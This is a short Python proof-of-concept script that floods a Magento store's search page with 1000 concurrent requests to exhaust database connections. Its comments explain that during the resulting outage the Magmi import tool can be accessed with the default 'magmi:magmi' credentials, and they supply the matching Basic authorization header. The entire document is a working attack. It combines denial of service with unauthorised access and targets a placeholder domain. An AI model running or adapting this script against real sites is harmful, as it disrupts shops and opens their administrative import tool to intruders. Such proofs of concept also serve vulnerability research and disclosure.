import asyncio
import aiohttp

# Usage : python3 ./http_flood.py
# Response code 503 indicates a potential successful "Too many connections" error
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100

# Replace [TARGET] with your Magento domain
url = "http://[TARGET]/catalogsearch/result/?q=e"

async def get(url):
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get(url=url) as response:
                print("Got url {} with response code {}.".format(url, response.status))
    except Exception as e:
        print("Unable to get url {} due to error {}.".format(url, e.__class__))

async def main():
    ret = await asyncio.gather(*[get(url) for _ in range(1000)])
    print("Finalized all. ret is a list of len {} outputs.".format(len(ret)))

asyncio.run(main())